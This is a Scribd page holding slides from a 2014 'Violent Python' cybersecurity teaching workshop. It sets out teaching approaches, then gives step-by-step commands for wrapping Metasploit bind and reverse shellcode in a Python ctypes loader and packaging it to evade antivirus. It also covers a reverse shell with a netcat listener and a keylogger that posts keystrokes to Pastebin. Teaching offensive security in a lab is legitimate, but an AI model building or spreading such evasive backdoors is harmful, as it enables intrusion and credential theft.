Scribd
Upload
14 views76 pages

ViolentPython ICEW 2014

The document outlines a workshop on innovations in cybersecurity education, emphasizing the need for diverse pedagogical approaches tailored to students' varying experiences and goals. It discusses resources for beginners, average, and advanced students, as well as independent projects and grading criteria. Additionally, it includes technical demonstrations related to ethical hacking using Python and Metasploit, highlighting the effectiveness of various antivirus software against specific payloads.

Uploaded by

youarenword
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
14 views76 pages

ViolentPython ICEW 2014

The document outlines a workshop on innovations in cybersecurity education, emphasizing the need for diverse pedagogical approaches tailored to students' varying experiences and goals. It discusses resources for beginners, average, and advanced students, as well as independent projects and grading criteria. Additionally, it includes technical demonstrations related to ethical hacking using Python and Metasploit, highlighting the effectiveness of various antivirus software against specific payloads.

Uploaded by

youarenword
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 76

Violent

 Python  
 
Innova/ons  in  Cybersecurity  Educa/on  
Workshop    
 
June  24,  2014  
Bio  
Pedagogy  
Diversity  in  Educa/on  
• Students  have  different  previous  experience,  
knowledge  and  goals  
• They  aren't  all  going  to  learn  the  same  things  
in  the  same  class  
• My  goal  is  NOT  to  make  them  all  achieve  the  
same  proficiency  
• My  goal  is  to  provide  every  student  with  
material  they  can  grasp  and  interes/ng  
challenges  
Beginners  
• Textbook  that  covers  the  material  
• Online  training  at  CodeCademy  
• DVDs  with  virtual  machines  ready  to  go  
• Hands-­‐on  projects  with  complete  step-­‐by-­‐step  
instruc/ons  
• Lab  /me  aSer  each  class  with  the  instructor  
available  to  help  
• Extensive  open  lab  /me    
Average  Students  
• Configure  their  own  home  machines  to  do  the  
projects  
• Work  at  home,  with  no  instructor  available  
• Simple  challenge  projects  without  instruc/ons  
Advanced  Students  
• Advanced  challenges  
• Online  security  puzzle  sites    
• Cyber  compe//ons  
• Following  the  news,  independent  work  on  
cuWng-­‐edge  topics  
Independent  Projects  
• Students  can  get  extra  credit  by  
– AXending  other  training  events  
– In-­‐class  presenta/ons  
– Researching  other  tools  or  techniques  
Grading  
• Must  achieve  a  level  of  
points  to  get  a  good  
grade  
• Many  possible  
combina/ons  of  
projects  can  get  there  
• May  skip  the  final  exam  
CNIT  124  
Advanced  Ethical  Hacking  
Two  Textbooks  

Required   Op/onal  
Violent  Python  
• Good  coding  principles  
– Excep/on  handling  
– Modular  design  
– Op/miza/on  
– Commen/ng  
– Flow  charts  
• FORGET  THEM  ALL  
Violent  Python  
• We  are  hackers  
• We  are  here  to  BREAK  STUFF  
• It  should  be  fast  and  easy  for  a  complete  
novice  to  hack  together  a  simple  script  to  do  
something  fun!  
Projects  
An/virus  
 
Ungh!    Good  God  y'all...  
 
What  is  it  GOOD  For?  
Mikko  Hypponen  Video  
Metasploit  Payloads  
Metasploit  
• Hundreds  of  payloads  
• The  simplest  one:  bind_tcp  
• Listens  on  a  TCP  port  for  commands  
Simple  Reverse  Shell  
• One  command  to  produce  very  simple  
Windows  EXE  malware  
An/virus  Catches  It  
Norton  v.  Shell.exe  
Norton  Iden/fies  the  Metasploit  
Packer  
VirusTotal:  37/49  Detec/ons  
How  to  
Become  
007  
Python  v.  AV  
Round  1  
shell_bind_tcp  
Export  Metasploit  Payloads  to  C  
Use  Ctypes  Python  Library  
Compile  it  on  Windows  
• Install  these    things,  in  order  
– Python  2.7  
– PyWin32  
– pip-­‐Win  
– PyInstaller  
• This  creates  an  EXE  file  that  listens  on  a  TCP  
port  
DEMO  
• On  Kali  
msfpayload windows/shell_bind_tcp C > foo!
nano foo!
• Change  top  to  
from ctypes import *!
shellcode = (!

• Change  boXom  to  


);!
memorywithshell = create_string_buffer(shellcode,
len(shellcode))!
shell = cast(memorywithshell,
CFUNCTYPE(c_void_p))!
shell()!
DEMO  
• On  Windows,  in  pip-­‐Win:  
venv -c -i pyi-env-name!
pyinstaller --onefile --noconsole foo!
VirusTotal:  1/50  Detec/on  
Norton  Support  
• I  Tweeted  about  this,  and  @NortonSupport  
replied  
• VirusTotal  is  not  a  fair  test,  because  real  
installed  Norton  uses  Heuris/c  Scanning  
• @NortonSupport  gave  me  a  link  for  a  30-­‐day  
trial  version  :)  
Norton  Wins!  
Kaspersky  Wins!  
• Avast!  doesn't  detect  it  
• Kaspersky  detects  it  as  
HEUR:Trojan.Win32.Generic  
Python  v.  AV  
Round  2  
shell_bind_tcp  
with  a  delay  
DEMO  
• On  Kali  
cp foo foo2!
nano foo2!
x=raw_input("Press Enter to continue")!

• On  Windows,  in  pip-­‐Win:  


venv -c -i pyi-env-name!
pyinstaller --onefile foo2!
Norton,  Avast,  &  MSE  Lose!  
Kaspersky  Wins!  
Python  v.  AV  
Round  3  
shell_bind_tcp  
in  two  stages  
no  delay  
Other  AV  
• Tested  on  Mar  24,  2014  with  a  two-­‐stage  
reverse  shell  and  no  /me  delay  
• Al  these  failed  
– Norton  
– Nod32  
– Avast!  
– 360  Internet  Security  
– McAfee  
– Kaspersky  
Remember  Mikko?  
F-­‐Secure  Wins!  
AV  Challenge  
• Posted  April  3,  2014  
• No  reply  from  AV  vendors,  but  Norton  
improved  its  detec/on  aSer  that  
– Now  a  delay  is  required  
Python  v.  AV  
Round  4  
shell_bind_tcp  
with  a  delay  
INSTRUCTIONS  
• On  Kali  
msfpayload windows/shell_reverse_tcp
LHOST=192.168.119.252 C > rev!
nano rev!

• Change  top  to  


x=raw_input("Press Enter to continue")!
from ctypes import *!
shellcode = (!

• Change  boXom  to  


);!
memorywithshell = create_string_buffer(shellcode,
len(shellcode))!
shell = cast(memorywithshell, CFUNCTYPE(c_void_p))!
shell()!
INSTRUCTIONS  
• On  Windows,  in  pip-­‐Win:  
venv -c -i pyi-env-name!
pyinstaller --onefile rev!
• On  Kali  
nc –lp 4444!
Norton  Loses  
Kaspersky  Wins  
Advanced  Malware  Protec/on  
ty  @ChrisAbdalla_1  from  HP  ESP  TippingPoint  
• A  friend  in  the  financial  industry  tested  
Evil.exe  on  a  system  protected  by  FireEye  
• FireEye  gives  no  alerts  and  lets  it  post  
keystrokes  right  to  Pastebin  
Python  Keylogger  
Google  
"Python  
Keylogger"  
• I  used  this  
one  from  4  
years  ago  
Post  Keystrokes  to  Pastebin  
Problem  
• Pastebin  busted  me  for  making  too  many  
pastes  in  a  24-­‐hour  period  
• So  I  wrote  my  own  Pastebin  imita/on  
Kaspersky  &  Avast!  LOSE  
Norton  WINS!  
But  just  add  a  delay...  
F-­‐Secure  LOSES!  
PRODUCT  ANNOUNCEMENT!  
Ultra-­‐Advanced  APT  Tool  

samsclass.info/evil.exe  
UNSTOPPABLE  
• None  of  these  products  stop  it  
– Norton  
– McAfee  
– Kaspersky  
– Nod32  
– F-­‐Secure  
– Avast!  
– MicrosoS  Security  Essen/als  

You might also like